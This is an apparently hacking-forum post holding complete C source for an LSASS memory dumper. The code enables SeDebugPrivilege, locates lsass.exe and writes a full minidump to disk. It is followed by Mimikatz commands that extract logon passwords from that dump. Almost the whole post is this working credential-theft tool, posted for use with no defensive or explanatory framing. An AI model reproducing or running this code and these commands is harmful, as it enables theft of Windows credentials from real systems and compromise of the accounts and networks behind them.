|
Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 498px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">//lsass mem dump // //coded by sasami_327 //////////////////////////////////////////////////////// #include <Windows.h> #include <DbgHelp.h> #include <stdio.h> #include <TlHelp32.h> #pragma comment(lib, "dbghelp") #define CWA(dll, api) ::api BOOL EnableSeDebugPrivilege(VOID) { HANDLE token = NULL; LUID luid, *pluid; TOKEN_PRIVILEGES tokenPriv, *ptokenPriv; BOOL ret = FALSE; if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) ) { printf("Successfully OpenProcessToken\n"); pluid = &luid; if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) ) { printf("Successfully LookupPrivilegeValueA\n"); ptokenPriv = &tokenPriv; ptokenPriv->PrivilegeCount = 1; ptokenPriv->Privileges[0].Luid = luid; ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) ) { printf("Successfully AdjustTokenPrivileges\n"); ret = TRUE; } else { printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError()); } } else { printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError()); } CWA(kernel32, CloseHandle)(token); } else { printf("Failed to OpenProcessToken with error=%d\n", GetLastError()); } return(ret); } VOID dump(DWORD pid) { HANDLE process = NULL; HANDLE file = NULL; if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_ READ, FALSE, pid) ) ) { if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) ) { if ( CWA(dbghelp, MiniDumpWriteDump)( process, pid, file, MiniDumpWithFullMemory, NULL, NULL, NULL ) ) { printf("OK\n"); } CWA(kernel32, CloseHandle)(file); } CWA(kernel32, CloseHandle)(process); } } DWORD GetPIDByProcessName(char* procName) { DWORD retPID = -1; PROCESSENTRY32 pEntry32, *ppEntry32; HANDLE snapshot = NULL; if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) ) { ppEntry32 = &pEntry32; ppEntry32->dwSize = sizeof(pEntry32); if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) ) { for ( ; ; ) { if ( !strcmp(procName, ppEntry32->szExeFile) ) { retPID = ppEntry32->th32ProcessID; break; } if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) ) { if ( ERROR_NO_MORE_FILES == GetLastError() ) { break; } } } } CWA(kernel32, CloseHandle)(snapshot); } return(retPID); } int main(int argc, char* argv[]) { DWORD lsass = GetPIDByProcessName("lsass.exe"); if ( -1 != lsass ) { printf("lsass=%d\n", lsass); if ( EnableSeDebugPrivilege() ) { dump(lsass); } } return(0); }</pre> sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords https://txgate.io/images/smilies/smoke.gif |
| All times are GMT. The time now is 02:36 PM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.